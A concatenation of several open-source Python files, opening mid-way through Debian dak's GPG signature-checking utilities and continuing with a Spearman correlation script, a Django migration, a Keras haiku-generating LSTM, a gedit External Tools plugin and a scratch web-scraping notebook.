    # confirm before touching.
    os.dup2(c2pread, c2pwrite)
    os.dup2(errout, errin)
    output = status = ""
    while 1:
        i, o, e = select.select([c2pwrite, errin, status_read], [], [])
        more_data = []
        for fd in i:
            r = os.read(fd, 8196)
            if len(r) > 0:
                more_data.append(fd)
                if fd == c2pwrite or fd == errin:
                    output += r
                elif fd == status_read:
                    status += r
                else:
                    fubar("Unexpected file descriptor [%s] returned from select\n" % (fd))
        if not more_data:
            # All pipes hit EOF: reap the child and close everything.
            pid, exit_status = os.waitpid(pid, 0)
            try:
                os.close(status_write)
                os.close(status_read)
                os.close(c2pread)
                os.close(c2pwrite)
                os.close(p2cwrite)
                os.close(errin)
                os.close(errout)
            except:
                pass
            break
    return output, status, exit_status
################################################################################
def process_gpgv_output(status):
    """Parse gpgv --status-fd output.

    Returns (keywords, internal_error): 'keywords' maps each status token
    (e.g. 'GOODSIG') to its argument list; 'internal_error' collects a
    description of every malformed line (empty string when all is well).
    """
    # Process the status-fd output
    keywords = {}
    internal_error = ""
    for line in status.split('\n'):
        line = line.strip()
        if line == "":
            continue
        split = line.split()
        if len(split) < 2:
            internal_error += "gpgv status line is malformed (< 2 atoms) ['%s'].\n" % (line)
            continue
        (gnupg, keyword) = split[:2]
        if gnupg != "[GNUPG:]":
            internal_error += "gpgv status line is malformed (incorrect prefix '%s').\n" % (gnupg)
            continue
        args = split[2:]
        # 'keyword in keywords' replaces the Python-2-only dict.has_key().
        # A few tokens may legitimately repeat; for those the last
        # occurrence wins.
        if keyword in keywords and keyword not in [ "NODATA", "SIGEXPIRED", "KEYEXPIRED" ]:
            internal_error += "found duplicate status token ('%s').\n" % (keyword)
            continue
        else:
            keywords[keyword] = args
    return (keywords, internal_error)
################################################################################
def retrieve_key (filename, keyserver=None, keyring=None):
    """
    Retrieve the key that signed 'filename' from 'keyserver' and
    add it to 'keyring'. Returns nothing on success, or an error message
    on error.

    'keyserver' defaults to Dinstall::KeyServer from the config;
    'keyring' defaults to the primary keyring.
    """
    # Defaults for keyserver and keyring
    if not keyserver:
        keyserver = Cnf["Dinstall::KeyServer"]
    if not keyring:
        keyring = get_primary_keyring_path()
    # Ensure the filename contains no shell meta-characters or other badness
    if not re_taint_free.match(filename):
        return "%s: tainted filename" % (filename)
    # Invoke gpgv on the file with an empty keyring: the expected outcome
    # is a NO_PUBKEY token naming the fingerprint we need to fetch.
    status_read, status_write = os.pipe()
    cmd = "gpgv --status-fd %s --keyring /dev/null %s" % (status_write, filename)
    (_, status, _) = gpgv_get_status_output(cmd, status_read, status_write)
    # Process the status-fd output
    (keywords, internal_error) = process_gpgv_output(status)
    if internal_error:
        return internal_error
    if not keywords.has_key("NO_PUBKEY"):
        return "didn't find expected NO_PUBKEY in gpgv status-fd output"
    fingerprint = keywords["NO_PUBKEY"][0]
    # XXX - gpg sucks. You can't use --secret-keyring=/dev/null as
    # it'll try to create a lockfile in /dev. A better solution might
    # be a tempfile or something.
    cmd = "gpg --no-default-keyring --secret-keyring=%s --no-options" \
          % (Cnf["Dinstall::SigningKeyring"])
    cmd += " --keyring %s --keyserver %s --recv-key %s" \
           % (keyring, keyserver, fingerprint)
    (result, output) = commands.getstatusoutput(cmd)
    if (result != 0):
        return "'%s' failed with exit code %s" % (cmd, result)
    return ""
################################################################################
def gpg_keyring_args(keyrings=None):
    """Build a '--keyring PATH' argument string for each given keyring
    path (defaulting to the active keyrings from the database)."""
    if not keyrings:
        keyrings = get_active_keyring_paths()
    args = ["--keyring %s" % path for path in keyrings]
    return " ".join(args)
################################################################################
@session_wrapper
def check_signature (sig_filename, data_filename="", keyrings=None, autofetch=None, session=None):
    """
    Check the signature of a file.

    @param sig_filename: name of the file whose signature should be
        checked; must not contain shell meta-characters.
    @param data_filename: optional name of the file a detached signature
        applies to.
    @param keyrings: optional list of keyrings to use (defaults to the
        active keyrings from the database).
    @param autofetch: None, True or False; if None, the behaviour
        configured via Dinstall::KeyAutoFetch is used.

    @return: a tuple (fingerprint, rejects).  On success 'rejects' is an
        empty list; on any failure 'fingerprint' is None and 'rejects'
        contains the error messages.
    """
    rejects = []
    # Ensure the filename contains no shell meta-characters or other badness
    if not re_taint_free.match(sig_filename):
        rejects.append("!!WARNING!! tainted signature filename: '%s'." % (sig_filename))
        return (None, rejects)
    if data_filename and not re_taint_free.match(data_filename):
        rejects.append("!!WARNING!! tainted data filename: '%s'." % (data_filename))
        return (None, rejects)
    if not keyrings:
        keyrings = [ x.keyring_name for x in session.query(Keyring).filter(Keyring.active == True).all() ]
    # Autofetch the signing key if that's enabled
    if autofetch is None:
        autofetch = Cnf.get("Dinstall::KeyAutoFetch")
    if autofetch:
        error_msg = retrieve_key(sig_filename)
        if error_msg:
            rejects.append(error_msg)
            return (None, rejects)
    # Build the command line
    status_read, status_write = os.pipe()
    cmd = "gpgv --status-fd %s %s %s %s" % (
        status_write, gpg_keyring_args(keyrings), sig_filename, data_filename)
    # Invoke gpgv on the file
    (output, status, exit_status) = gpgv_get_status_output(cmd, status_read, status_write)
    # Process the status-fd output
    (keywords, internal_error) = process_gpgv_output(status)
    # If we failed to parse the status-fd output, let's just whine and bail now
    if internal_error:
        rejects.append("internal error while performing signature check on %s." % (sig_filename))
        # list.append() takes exactly one argument; the original passed a
        # second "" here, raising TypeError whenever this path was hit.
        rejects.append(internal_error)
        rejects.append("Please report the above errors to the Archive maintainers by replying to this mail.")
        return (None, rejects)
    # Now check for obviously bad things in the processed output
    # ('k in keywords' replaces the Python-2-only dict.has_key()).
    if "KEYREVOKED" in keywords:
        rejects.append("The key used to sign %s has been revoked." % (sig_filename))
    if "BADSIG" in keywords:
        rejects.append("bad signature on %s." % (sig_filename))
    if "ERRSIG" in keywords and "NO_PUBKEY" not in keywords:
        rejects.append("failed to check signature on %s." % (sig_filename))
    if "NO_PUBKEY" in keywords:
        args = keywords["NO_PUBKEY"]
        if len(args) >= 1:
            key = args[0]
        rejects.append("The key (0x%s) used to sign %s wasn't found in the keyring(s)." % (key, sig_filename))
    if "BADARMOR" in keywords:
        rejects.append("ASCII armour of signature was corrupt in %s." % (sig_filename))
    if "NODATA" in keywords:
        rejects.append("no signature found in %s." % (sig_filename))
    if "EXPKEYSIG" in keywords:
        args = keywords["EXPKEYSIG"]
        if len(args) >= 1:
            key = args[0]
        rejects.append("Signature made by expired key 0x%s" % (key))
    if "KEYEXPIRED" in keywords and "GOODSIG" not in keywords:
        args = keywords["KEYEXPIRED"]
        expiredate = ""
        if len(args) >= 1:
            timestamp = args[0]
            if timestamp.count("T") == 0:
                try:
                    expiredate = time.strftime("%Y-%m-%d", time.gmtime(float(timestamp)))
                except ValueError:
                    expiredate = "unknown (%s)" % (timestamp)
            else:
                expiredate = timestamp
        rejects.append("The key used to sign %s has expired on %s" % (sig_filename, expiredate))
    if len(rejects) > 0:
        return (None, rejects)
    # Next check gpgv exited with a zero return code
    if exit_status:
        rejects.append("gpgv failed while checking %s." % (sig_filename))
        if status.strip():
            rejects.append(prefix_multi_line_string(status, " [GPG status-fd output:] "))
        else:
            rejects.append(prefix_multi_line_string(output, " [GPG output:] "))
        return (None, rejects)
    # Sanity check the good stuff we expect
    if "VALIDSIG" not in keywords:
        rejects.append("signature on %s does not appear to be valid [No VALIDSIG]." % (sig_filename))
    else:
        args = keywords["VALIDSIG"]
        if len(args) < 1:
            rejects.append("internal error while checking signature on %s." % (sig_filename))
        else:
            fingerprint = args[0]
    if "GOODSIG" not in keywords:
        rejects.append("signature on %s does not appear to be valid [No GOODSIG]." % (sig_filename))
    if "SIG_ID" not in keywords:
        rejects.append("signature on %s does not appear to be valid [No SIG_ID]." % (sig_filename))
    # Finally ensure there's not something we don't recognise
    known_keywords = dict(VALIDSIG="",SIG_ID="",GOODSIG="",BADSIG="",ERRSIG="",
                          SIGEXPIRED="",KEYREVOKED="",NO_PUBKEY="",BADARMOR="",
                          NODATA="",NOTATION_DATA="",NOTATION_NAME="",KEYEXPIRED="",POLICY_URL="")
    for keyword in keywords.keys():
        if keyword not in known_keywords:
            rejects.append("found unknown status token '%s' from gpgv with args '%r' in %s." % (keyword, keywords[keyword], sig_filename))
    if len(rejects) > 0:
        return (None, rejects)
    else:
        return (fingerprint, [])
################################################################################
def gpg_get_key_addresses(fingerprint):
    """retreive email addresses from gpg key uids for a given fingerprint"""
    # Results are memoised in the module-global key_uid_email_cache, so
    # gpg is invoked at most once per fingerprint per process.
    addresses = key_uid_email_cache.get(fingerprint)
    if addresses != None:
        return addresses
    addresses = list()
    cmd = "gpg --no-default-keyring %s --fingerprint %s" \
          % (gpg_keyring_args(), fingerprint)
    (result, output) = commands.getstatusoutput(cmd)
    if result == 0:
        for l in output.split('\n'):
            # re_gpg_uid extracts the mail address from each 'uid' line.
            m = re_gpg_uid.match(l)
            if m:
                addresses.append(m.group(1))
    # Note: a failed gpg run caches an empty list for this fingerprint.
    key_uid_email_cache[fingerprint] = addresses
    return addresses
################################################################################
def clean_symlink (src, dest, root):
    """
    Relativize an absolute symlink from 'src' -> 'dest' relative to 'root'.
    Returns fixed 'src'
    """
    rel_src = src.replace(root, '', 1)
    rel_destdir = os.path.dirname(dest.replace(root, '', 1))
    depth = len(rel_destdir.split('/'))
    return ('../' * depth) + rel_src
################################################################################
def temp_filename(directory=None, prefix="dak", suffix=""):
    """
    Return a secure and unique filename by pre-creating it.

    'directory', 'prefix' and 'suffix' are passed straight through to
    tempfile.mkstemp.  Returns a pair (fd, name); the caller owns both the
    open descriptor and the file.
    """
    fd, name = tempfile.mkstemp(suffix, prefix, directory)
    return (fd, name)
################################################################################
def temp_dirname(parent=None, prefix="dak", suffix=""):
    """
    Return a secure and unique directory by pre-creating it.

    'parent', 'prefix' and 'suffix' are passed straight through to
    tempfile.mkdtemp.  Returns the pathname of the new directory, which
    the caller is responsible for removing.
    """
    path = tempfile.mkdtemp(suffix, prefix, parent)
    return path
################################################################################
def is_email_alias(email):
    """ checks if the user part of the email is listed in the alias file

    The alias file is read once per process and cached in the module-global
    'alias_cache' set of local-parts.
    """
    global alias_cache
    # Build the cache lazily on first use ('is None' replaces '== None').
    if alias_cache is None:
        aliasfn = which_alias_file()
        alias_cache = set()
        if aliasfn:
            # Close the alias file when done; the original iterated an
            # anonymous open() and leaked the handle.
            fh = open(aliasfn)
            try:
                for l in fh:
                    alias_cache.add(l.split(':')[0])
            finally:
                fh.close()
    uid = email.split('@')[0]
    return uid in alias_cache
################################################################################
def get_changes_files(from_dir):
    """
    List all .changes files in 'from_dir' and chdir into it (the chdir is
    deliberate: much of p-u/p-a misbehaves when not run from the right
    place).  Returns a list of bare filenames; exits via fubar() if the
    directory cannot be read.
    """
    try:
        # Much of the rest of p-u/p-a depends on being in the right place
        os.chdir(from_dir)
        changes_files = [entry for entry in os.listdir(from_dir) if entry.endswith('.changes')]
    except OSError as e:
        fubar("Failed to read list from directory %s (%s)" % (from_dir, e))
    return changes_files
################################################################################
# Module initialisation: build the global 'Cnf' configuration.  The config
# files are skipped entirely when DAK_TEST is set, so the test suite can
# run without a deployed dak.conf.
apt_pkg.init()
Cnf = apt_pkg.Configuration()
if not os.getenv("DAK_TEST"):
    # Load the defaults first, then overlay the host-specific config if it
    # differs from the default one.
    apt_pkg.read_config_file_isc(Cnf,default_config)
    if which_conf_file() != default_config:
        apt_pkg.read_config_file_isc(Cnf,which_conf_file())
################################################################################
def parse_wnpp_bug_file(file = "/srv/ftp-master.debian.org/scripts/masterfiles/wnpp_rm"):
    """
    Parses the wnpp bug list available at http://qa.debian.org/data/bts/wnpp_rm
    Well, actually it parsed a local copy, but let's document the source
    somewhere ;)
    returns a dict associating source package name with a list of open wnpp
    bugs (Yes, there might be more than one)
    """
    try:
        f = open(file)
        try:
            lines = f.readlines()
        finally:
            # Close the handle (the original leaked it).
            f.close()
    except IOError:
        # Parenthesized print is valid in both Python 2 and 3.
        print ("Warning: Couldn't open %s; don't know about WNPP bugs, so won't close any." % file)
        lines = []
    wnpp = {}
    for line in lines:
        splited_line = line.split(": ", 1)
        if len(splited_line) > 1:
            wnpp[splited_line[0]] = splited_line[1].split("|")
    for source in wnpp.keys():
        bugs = []
        for wnpp_bug in wnpp[source]:
            # Guard against entries without any digits: the original called
            # .group() on a possible None, raising AttributeError.
            match = re.search(r"(\d)+", wnpp_bug)
            if match:
                bugs.append(match.group())
        wnpp[source] = bugs
    return wnpp
################################################################################
def get_packages_from_ftp(root, suite, component, architecture):
    """
    Returns an object containing apt_pkg-parseable data collected by
    aggregating Packages.gz files gathered for each architecture.

    @type root: string
    @param root: path to ftp archive root directory
    @type suite: string
    @param suite: suite to extract files from
    @type component: string
    @param component: component to extract files from
    @type architecture: string
    @param architecture: architecture to extract files from
    @rtype: TagFile
    @return: apt_pkg class containing package data
    """
    # NOTE(review): the gunzip command line is built by string interpolation
    # and run through a shell ('commands' module, Python 2 only) — the
    # arguments come from the archive config, not user input, but quoting
    # would still be safer.
    filename = "%s/dists/%s/%s/binary-%s/Packages.gz" % (root, suite, component, architecture)
    (fd, temp_file) = temp_filename()
    (result, output) = commands.getstatusoutput("gunzip -c %s > %s" % (filename, temp_file))
    if (result != 0):
        fubar("Gunzip invocation failed!\n%s\n" % (output), result)
    # Append the debian-installer packages for the same architecture, if any.
    filename = "%s/dists/%s/%s/debian-installer/binary-%s/Packages.gz" % (root, suite, component, architecture)
    if os.path.exists(filename):
        (result, output) = commands.getstatusoutput("gunzip -c %s >> %s" % (filename, temp_file))
        if (result != 0):
            fubar("Gunzip invocation failed!\n%s\n" % (output), result)
    packages = open_file(temp_file)
    # apt_pkg.ParseTagFile keeps reading from the (unlinked) open handle.
    Packages = apt_pkg.ParseTagFile(packages)
    os.unlink(temp_file)
    return Packages
################################################################################
def deb_extract_control(fh):
    """Return the raw DEBIAN/control member from a binary package opened
    as the file object 'fh'."""
    deb = apt_inst.DebFile(fh)
    return deb.control.extractdata("control")
################################################################################
def mail_addresses_for_upload(maintainer, changed_by, fingerprint):
    """Mail addresses to contact for an upload

    Args:
       maintainer (str): Maintainer field of the changes file
       changed_by (str): Changed-By field of the changes file
       fingerprint (str): Fingerprint of the PGP key used to sign the upload

    Returns:
       List of RFC 2047-encoded mail addresses to contact regarding this upload
    """
    addresses = [maintainer]
    if changed_by != maintainer:
        addresses.append(changed_by)
    fpr_addresses = gpg_get_key_addresses(fingerprint)
    # Guard against a key with no uid addresses: without the leading check,
    # the 'not in' tests are vacuously true and fpr_addresses[0] raises
    # IndexError.
    if fpr_addresses and fix_maintainer(changed_by)[3] not in fpr_addresses and fix_maintainer(maintainer)[3] not in fpr_addresses:
        addresses.append(fpr_addresses[0])
    encoded_addresses = [ fix_maintainer(e)[1] for e in addresses ]
    return encoded_addresses
| luther07/dak | daklib/utils.py | Python | gpl-2.0 | 54,903 |
# Spearman co-occurrence script.
# Usage: script.py <table> <number-of-metadata-columns> <output-csv>
import sys
import pandas
import scipy
import numpy
from scipy import stats
from scipy.stats import t

# arguments being passed
path_of_file = sys.argv[1]
last_metadata_column = int(sys.argv[2])
path_to_write = sys.argv[3]

# spearman p calc based on a two-tailed t-test
def spearmanp(r, n):
    """Two-tailed p-value for Spearman correlation 'r' over 'n' samples."""
    tstat = r * numpy.sqrt((n - 2) / (1 - r**2))
    return t.cdf(-abs(tstat), n - 2) * 2

# read in the data
df = pandas.read_table(path_of_file, index_col=False)
# remove metadata columns
df_data_only = df.drop(df.columns[[range(0, last_metadata_column)]], axis=1)
# make correlation matrix
df_corr_matrix = df_data_only.corr(method="spearman")
# make column based on rows (called indexes in python)
df_corr_matrix["otus"] = df_corr_matrix.index
# melt dataframe but maintain indices now called otus
df_melt = pandas.melt(df_corr_matrix, id_vars="otus")
# remove NAs or NaNs which are result of non-existent otus (all 0 values)
df_melt = df_melt[numpy.isfinite(df_melt.value)]
# BUG FIX: the original referenced an undefined name 'df_sub' (NameError);
# the sample size is the number of rows in the data-only frame.
df_melt['p.value'] = spearmanp(df_melt.value, df_data_only.shape[0])
# write the file
df_melt.to_csv(path_to_write, index=False)
| ryanjw/co-occurrence_python | first_attempt.py | Python | gpl-2.0 | 1,125 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
class Migration(migrations.Migration):
    """Adds Schedule.logic_delete (soft-delete flag) and rewrites the
    pub_date defaults on Flight and Schedule.

    NOTE(review): the datetime defaults below are concrete timestamps
    frozen at makemigrations time — an artifact of a non-callable model
    default; harmless in a migration, but worth fixing on the model.
    """

    dependencies = [
        ('flyerapp', '0007_auto_20150629_1135'),
    ]

    operations = [
        migrations.AddField(
            model_name='schedule',
            name='logic_delete',
            field=models.BooleanField(default=False),
        ),
        migrations.AlterField(
            model_name='flight',
            name='pub_date',
            field=models.DateTimeField(default=datetime.datetime(2015, 6, 30, 18, 59, 57, 180047), null=True, verbose_name=b'date published'),
        ),
        migrations.AlterField(
            model_name='schedule',
            name='pub_date',
            field=models.DateTimeField(default=datetime.datetime(2015, 6, 30, 18, 59, 57, 180807), null=True, verbose_name=b'date published'),
        ),
    ]
| luzeduardo/antonov225 | flyer/flyerapp/migrations/0008_auto_20150630_1859.py | Python | gpl-2.0 | 924 |
from keras.models import Sequential
from keras.layers.core import Dense, Activation, Dropout
from keras.layers.recurrent import LSTM
from keras.preprocessing.sequence import pad_sequences
import numpy as np
import random, sys
'''
Example script to generate haiku Text.
It is recommended to run this script on GPU, as recurrent
networks are quite computationally intensive.
If you try this script on new data, make sure your corpus
has at least ~100k characters. ~1M is better.
'''
# --- Corpus loading and vectorisation -------------------------------------
path = "haiku_all.txt"
text = open(path).read().lower()
print('corpus length:', len(text))
# NOTE(review): set iteration order is not stable across interpreter runs,
# so char_indices/indices_char differ between runs — a trained model's
# weights are only meaningful together with these mappings.
chars = set(text)
print('total chars:', len(chars))
char_indices = dict((c, i) for i, c in enumerate(chars))
indices_char = dict((i, c) for i, c in enumerate(chars))
# cut the text in semi-redundant sequences of maxlen characters
maxlen = 100
step = 3
sentences = []
next_chars = []
for i in range(0, len(text) - maxlen, step):
    sentences.append(text[i : i + maxlen])
    next_chars.append(text[i + maxlen])
print('nb sequences:', len(sentences))
print('Vectorization...')
# One-hot encode: X[i, t, c] marks character c at position t of sample i;
# y[i, c] marks the character that follows the sequence.
# NOTE(review): np.bool is removed in modern NumPy; use bool if upgrading.
X = np.zeros((len(sentences), maxlen, len(chars)), dtype=np.bool)
y = np.zeros((len(sentences), len(chars)), dtype=np.bool)
for i, sentence in enumerate(sentences):
    for t, char in enumerate(sentence):
        X[i, t, char_indices[char]] = 1
    y[i, char_indices[next_chars[i]]] = 1
print "X.shape: %s, Y.shape: %s" % (X.shape, y.shape)
# build the model: 2 stacked LSTM
print('Build model...')
model = Sequential()
model.add(LSTM(len(chars), 512, return_sequences=False))
model.add(Dropout(0.2))
## Remove above 2 lines and replace by below 2 lines to make 2 layers LSTM.
#model.add(LSTM(len(chars), 512, return_sequences=True))
#model.add(Dropout(0.2))
#model.add(LSTM(512, 512, return_sequences=False))
#model.add(Dropout(0.2))
model.add(Dense(512, len(chars)))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
# helper function to sample an index from a probability array
def sample(a, temperature=1.0):
    """Draw one index from the probability array 'a' after reweighting it
    by 'temperature' (lower temperature sharpens the distribution)."""
    weighted = np.log(a) / temperature
    probs = np.exp(weighted) / np.sum(np.exp(weighted))
    return np.argmax(np.random.multinomial(1, probs, 1))
# train the model, output generated text after each iteration
def generate_from_model(model, begin_sent=None, diversity_l=[0.2, 0.5, 1.0, 1.2]):
    """Sample text from 'model' at each temperature in diversity_l and echo
    it to stdout.

    Seeds with 'begin_sent' if given, otherwise with a random maxlen-sized
    slice of the module-global corpus 'text'.  Generation stops after 120
    characters or 3 tab-terminated lines.  Relies on the module globals
    text, maxlen, chars, char_indices and indices_char.  The mutable
    default for diversity_l is safe here because it is never mutated.
    """
    if begin_sent is None:
        start_index = random.randint(0, len(text) - maxlen - 1)
    for diversity in diversity_l:
        print
        print '----- diversity:', diversity
        generated = ''
        if begin_sent is None:
            sentence = text[start_index : start_index + maxlen]
        else:
            sentence = begin_sent
        generated += sentence
        print '----- Generating with seed: "' + sentence + '"'
        sys.stdout.write(generated)
        tot_lines = 0
        tot_chars = 0
        while True:
            if tot_lines > 3 or tot_chars > 120:
                break
            # One-hot encode the current window as a single-sample batch.
            x = np.zeros((1, maxlen, len(chars)))
            for t, char in enumerate(sentence):
                x[0, t, char_indices[char]] = 1.
            preds = model.predict(x, verbose=0)[0]
            next_index = sample(preds, diversity)
            next_char = indices_char[next_index]
            tot_chars += 1
            generated += next_char
            # Tabs delimit haiku lines in the training corpus.
            if next_char == '\t':
                tot_lines += 1
            # Slide the window forward by one character.
            sentence = sentence[1:] + next_char
            sys.stdout.write(next_char)
            sys.stdout.flush()
        print ""
if __name__ == "__main__":
    # Train once over the whole corpus, then sample at several temperatures.
    history = model.fit(X, y, batch_size=200, nb_epoch=20)
    generate_from_model(model)
    # Disabled variant: retrain with growing batch sizes between samples.
    """
    for i in xrange(1,4):
        history = model.fit(X, y, batch_size=100*i, nb_epoch=20)
        generate_from_model(model)
    """
| napsternxg/haiku_rnn | haiku_gen.py | Python | gpl-2.0 | 3,766 |
# -*- coding: UTF-8 -*-
# Gedit External Tools plugin
# Copyright (C) 2005-2006 Steve Frécinaux <steve@istique.net>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
__all__ = ('ExternalToolsPlugin', 'Manager', 'OutputPanel', 'Capture', 'UniqueById')
from gi.repository import GLib, Gio, GObject, Gtk, Gedit, PeasGtk
from .manager import Manager
from .library import ToolLibrary
from .outputpanel import OutputPanel
from .capture import Capture
from .functions import *
class ToolMenu(object):
    """Mirrors the external-tools library as a Gio submenu.

    Creates one window action (plus optional accelerator) per tool and
    keeps each action's enabled state in sync with the active document
    via filter()."""

    def __init__(self, library, window, panel, menu):
        super(ToolMenu, self).__init__()
        self._library = library
        self._window = window
        self._panel = panel
        self._menu = menu
        self._action_tools = {}   # action name -> tool object
        self.update()

    def deactivate(self):
        self.remove()

    def remove(self):
        """Drop every menu item, window action and accelerator we added."""
        self._menu.remove_all()
        for name, tool in self._action_tools.items():
            self._window.remove_action(name)
            if tool.shortcut:
                app = Gio.Application.get_default()
                app.remove_accelerator(tool.shortcut)
        self._action_tools = {}

    def _insert_directory(self, directory, menu):
        """Recursively mirror the library tree as nested submenus."""
        for d in sorted(directory.subdirs, key=lambda x: x.name.lower()):
            submenu = Gio.Menu()
            # '__' escapes literal underscores (mnemonic marker in menus).
            menu.append_submenu(d.name.replace('_', '__'), submenu)
            section = Gio.Menu()
            submenu.append_section(None, section)
            self._insert_directory(d, section)
        for tool in sorted(directory.tools, key=lambda x: x.name.lower()):
            # Build a unique action name from object identities.
            action_name = 'external-tool_%X_%X' % (id(tool), id(tool.name))
            self._action_tools[action_name] = tool
            action = Gio.SimpleAction(name=action_name)
            action.connect('activate', capture_menu_action, self._window, self._panel, tool)
            self._window.add_action(action)
            item = Gio.MenuItem.new(tool.name.replace('_', '__'), "win.%s" % action_name)
            # Hide (not just grey out) tools that don't apply.
            item.set_attribute_value("hidden-when", GLib.Variant.new_string("action-disabled"))
            menu.append_item(item)
            if tool.shortcut:
                app = Gio.Application.get_default()
                app.add_accelerator(tool.shortcut, "win.%s" % action_name, None)

    def update(self):
        """Rebuild the whole menu from the library and re-apply filtering."""
        self.remove()
        self._insert_directory(self._library.tree, self._menu)
        self.filter(self._window.get_active_document())

    def filter_language(self, language, item):
        """True if 'item' applies to 'language'; a tool with no language
        list applies everywhere, 'plain' matches undetected languages."""
        if not item.languages:
            return True
        if not language and 'plain' in item.languages:
            return True
        if language and (language.get_id() in item.languages):
            return True
        else:
            return False

    def filter(self, document):
        """Enable/disable each tool action for the given document (None
        when no document is active)."""
        if document is None:
            titled = False
            remote = False
            language = None
        else:
            titled = document.get_location() is not None
            remote = not document.is_local()
            language = document.get_language()
        # Map each tool 'applicability' keyword to its truth for this doc.
        states = {
            'always': True,
            'all' : document is not None,
            'local': titled and not remote,
            'remote': titled and remote,
            'titled': titled,
            'untitled': not titled,
        }
        for name, tool in self._action_tools.items():
            action = self._window.lookup_action(name)
            if action:
                action.set_enabled(states[tool.applicability] and
                                   self.filter_language(language, tool))
# FIXME: restore the launch of the manager on configure using PeasGtk.Configurable
class WindowActivatable(GObject.Object, Gedit.WindowActivatable):
__gtype_name__ = "ExternalToolsWindowActivatable"
window = GObject.property(type=Gedit.Window)
    def __init__(self):
        GObject.Object.__init__(self)
        self._manager = None               # Manager dialog, created lazily
        self._manager_default_size = None  # remembered dialog size, if any
        self.menu = None                   # ToolMenu, built in do_activate()
def do_activate(self):
# Ugly hack... we need to get access to the activatable to update the menuitems
self.window._external_tools_window_activatable = self
self._library = ToolLibrary()
action = Gio.SimpleAction(name="manage_tools")
action.connect("activate", lambda action, parameter: self.open_dialog())
self.window.add_action(action)
self.gear_menu = self.extend_gear_menu("ext9")
item = Gio.MenuItem.new(_("Manage _External Tools..."), "win.manage_tools")
self.gear_menu.append_menu_item(item)
external_tools_submenu = Gio.Menu()
item = Gio.MenuItem.new_submenu(_("External _Tools"), external_tools_submenu)
self.gear_menu.append_menu_item(item)
external_tools_submenu_section = Gio.Menu()
external_tools_submenu.append_section(None, external_tools_submenu_section)
# Create output console
self._output_buffer = OutputPanel(self.plugin_info.get_data_dir(), self.window)
self.menu = ToolMenu(self._library, self.window, self._output_buffer, external_tools_submenu_section)
bottom = self.window.get_bottom_panel()
bottom.add_titled(self._output_buffer.panel, "GeditExternalToolsShellOutput", _("Tool Output"))
def do_update_state(self):
if self.menu is not None:
self.menu.filter(self.window.get_active_document())
def do_deactivate(self):
self.window._external_tools_window_activatable = None
self.menu.deactivate()
self.window.remove_action("manage_tools")
bottom = self.window.get_bottom_panel()
bottom.remove(self._output_buffer.panel)
def open_dialog(self):
if not self._manager:
self._manager = Manager(self.plugin_info.get_data_dir())
if self._manager_default_size:
self._manager.dialog.set_default_size(*self._manager_default_size)
self._manager.dialog.connect('destroy', self.on_manager_destroy)
self._manager.connect('tools-updated', self.on_manager_tools_updated)
window = Gio.Application.get_default().get_active_window()
self._manager.run(window)
return self._manager.dialog
def update_manager(self, tool):
if self._manager:
self._manager.tool_changed(tool, True)
def on_manager_destroy(self, dialog):
self._manager_default_size = self._manager.get_final_size()
self._manager = None
def on_manager_tools_updated(self, manager):
for window in Gio.Application.get_default().get_windows():
window._external_tools_window_activatable.menu.update()
# ex:ts=4:et:
| halfline/gedit | plugins/externaltools/tools/windowactivatable.py | Python | gpl-2.0 | 7,385 |
# -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <headingcell level=1>
# Intercity Python API Development
# <codecell>
from bs4 import BeautifulSoup
import requests
import pickle
loadSite = requests.get('http://www.intercity.co.nz/')
siteData = loadSite.content
blehData = siteData.split()
blehData[0:20]
siteData.swapcase()
print siteData.find('a')
omgSite = BeautifulSoup(siteData)
linkZite = omgSite.text
# <codecell>
pickle.dump(linkZite, open('outpuz.txt', 'wb'))
# <codecell>
dizTxt = open('outpuz.txt', 'r')
dizTxt.read()
# <codecell>
def save(linkZite, path='save.txt'):
    """Write each entry of *linkZite* to *path*, one whitespace-normalized
    line per entry.

    Bug fixes vs. the original: the loop bound ``linz`` but the body read
    an undefined ``line``; the file handle was miscased (``savefilz`` vs
    ``saveFilz``, a NameError); and ``file.write`` was handed a list of
    tokens instead of a string (a TypeError).

    Parameters
    ----------
    linkZite : iterable of str
        Text entries to save.
    path : str
        Destination file; defaults to ``'save.txt'`` as before.
    """
    saveFilz = open(path, 'w')
    try:
        for linz in linkZite:
            # Collapse runs of whitespace, then emit one line per entry.
            values = linz.split()
            saveFilz.write(' '.join(values) + '\n')
    finally:
        # Close even if writing fails part-way through.
        saveFilz.close()
# <codecell>
print linkZite
# <codecell>
print omgSite.unwrap
# <codecell>
omgSite.encode
# <codecell>
savzSite = omgSite.find_all(id=True)
# <codecell>
sortSite = linkSite[0:30]
# <codecell>
print daSite.next_element
# <codecell>
daSite = sortSite[15]
# <codecell>
linkSite = omgSite.find_all('a')
# <codecell>
saveLinkz = open('htmldoc', 'w')
saveLinkz.write(siteData)
saveLinkz.close()
# <codecell>
openLinkz = open('htmldoc', 'r')
openLinkz.read()
# <codecell>
print omgSite.extract()
# <codecell>
print omgSite.setup
# <codecell>
print omgSite.title
# <codecell>
print omgSite.wrap
# <codecell>
print omgSite.body
# <codecell>
print omgSite.head
# <codecell>
print omgSite.currentTag()
# <codecell>
print omgSite.prettify
# <codecell>
# <codecell>
# <codecell>
print loadSite.url
# <codecell>
beaut = BeautifulSoup(loadSite)
# <codecell>
reTweetz = open('testing.txt', 'w')
reTweetz.write('Fixed request')
reTweetz.close()
# <codecell>
daTweetz = open('testing.txt', 'r')
daTweetz.read()
# <codecell>
print diemLink
# <codecell>
for data in loadSite:
mixData = BeautifulSoup(data)
diemLink = mixData.a
print diemLink
seioLink = mixData.findAll('a')
print seioLink
print(mixData.get_text())
# <codecell>
mixOpen = open('outputz', 'r')
mixOpen.read()
# <codecell>
%%bash
git add .
git commit -m daTweetz
# <codecell>
%%bash
git push https://github.com/wcmckee/intercity
# <codecell>
testing = []
# <codecell>
testing.append(daTweetz)
# <codecell>
print testing
# <codecell>
